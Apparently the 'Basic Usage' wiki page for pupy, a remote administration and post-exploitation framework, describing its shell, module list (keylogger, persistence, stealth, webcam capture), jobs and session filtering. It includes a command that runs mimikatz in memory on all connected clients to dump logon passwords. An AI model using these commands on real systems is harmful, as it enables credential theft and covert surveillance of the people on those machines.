-
Notifications
You must be signed in to change notification settings - Fork 1.8k
Basic Usage
First of all it is important to know that nearly all commands in pupy have a help builtin. So if at any moment you are wondering what a command does you can type your command followed by -h
or --help
.
>> sessions -h
>> jobs -h
>> run -h
This is even true for modules !
For example if you want to know how to use the pyexec module type :
>> run pyexec -h
usage: pyexec [-h] [--file <path>] [-c <code string>]
execute python code on a remote system
optional arguments:
-h, --help show this help message and exit
--file <path> execute code from .py file
-c <code string>, --code <code string>
execute python oneliner code. ex : 'import
platform;print platform.uname()'
Nearly all commands and modules in pupy have custom auto-completion. So if you are wondering what you need to type just press TAB
>> run
getsystem load_package msgbox ps shell_exec
download interactive_shell memory_exec persistence pyexec shellcode_exec
exit keylogger migrate port_scan pyshell socks5proxy
get_info linux_pers mimikatz portfwd screenshot upload
getprivs linux_stealth mouselogger process_kill search webcamsnap
>> run load_package
_sqlite3 linux_stealth psutil pupyimporter pyshell sqlite3
interactive_shell netcreds ptyshell pupymemexec pywintypes27.dll vidcap
linux_pers portscan pupwinutils pupyutils scapy
>> run pyexec -
--code --file --help -c -h
>> run pyexec --file /
/bin/ /etc/ /lib/ /libx32/ /media/ /proc/ /sbin/ /sys/ /var/
/boot/ /home/ /lib32/ /live-build/ /mnt/ /root/ /share/ /tmp/ /vmlinuz
/dev/ /initrd.img /lib64/ /lost+found/ /opt/ /run/ /srv/ /usr/
Every command in pupy shell uses a unix-like escaping syntax. If you need a space in one of your arguments you need to put your argument between quotes.
>> run shell_exec 'tasklist /V'
If you send a Windows path, you need to double the backquotes or put everything between quotes.
>> run download 'C:\Windows\System32\cmd.exe'
or
>> run download C:\\Windows\\System32\\cmd.exe
Modules aliases can be defined in the pupy.conf
file. If you define the following alias :
shell=interactive_shell
running the command shell
will be equivalent as running run interactive_shell
.
As an example, defining the following alias will add a command to kill the pupy client's process with signal 9:
killme = pyexec -c 'import os;os.kill(os.getpid(),9)'
Jobs are commands running in the background.
Some modules like socks5proxy
or portfwd
automatically start as jobs, but all modules can be run as jobs when used with the --bg
argument.
>> run --bg shell_exec 'tasklist /V'
[%] job < shell_exec ['tasklist /V'] > started in background !
The --bg
switch is typically used when you want to execute a long command/module and want the result later while having the shell still functioning.
The jobs output can be retrieved at any moment by using the jobs -p
command. From the jobs
command you can also list jobs status and kill jobs.
>> jobs
usage: jobs [-h] [-k <job_id>] [-l] [-p <job_id>]
list or kill jobs
optional arguments:
-h, --help show this help message and exit
-k <job_id>, --kill <job_id>
print the job current output before killing it
-l, --list list jobs
-p <job_id>, --print-output <job_id>
print a job output
Regular jobs can be set in Linux/Unix environments by running your pupysh.py
script inside the Screen utility. You can then setup cronjobs to run the below command at whatever intervals you require, this essentially pastes the input after the word 'stuff' into the screen session. Replace 1674 with the ID of your screen session, the echo command is the Enter key being pressed.
screen -S 1674 -X stuff 'this is an example command'$(echo -ne '\015')
By default pupy launch every module you run on all connected clients. This allows for example to run mimikatz on all connected clients and dump passwords everywhere in one command
>> run memory_exec /usr/share/mimikatz/Win32/mimikatz.exe privilege::debug sekurlsa::logonPasswords exit
To interact with one client, use the sessions -i
command.
- To interact with session 1
>> sessions -i 1
- To interact with all windows 7 only:
>> sessions -i 'platform:Windows release:7'
You can find all the available filtering parameters using the get_info
module.
Start your command with a !
>> !ls